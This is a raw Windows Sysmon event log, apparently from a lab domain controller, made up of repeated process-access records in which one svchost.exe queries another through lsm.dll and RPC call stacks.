13:29:59.045{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010519Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.045{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010518Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.045{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010517Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.045{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010516Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.045{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010515Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.045{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010514Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.045{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010513Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.045{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010512Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.045{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010511Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.045{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010510Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.045{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010509Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.045{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010508Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010507Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010506Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010505Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010504Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010503Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010502Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.029{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010501Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.029{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010500Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.029{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010499Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.029{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010498Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.029{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010497Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.029{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010496Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 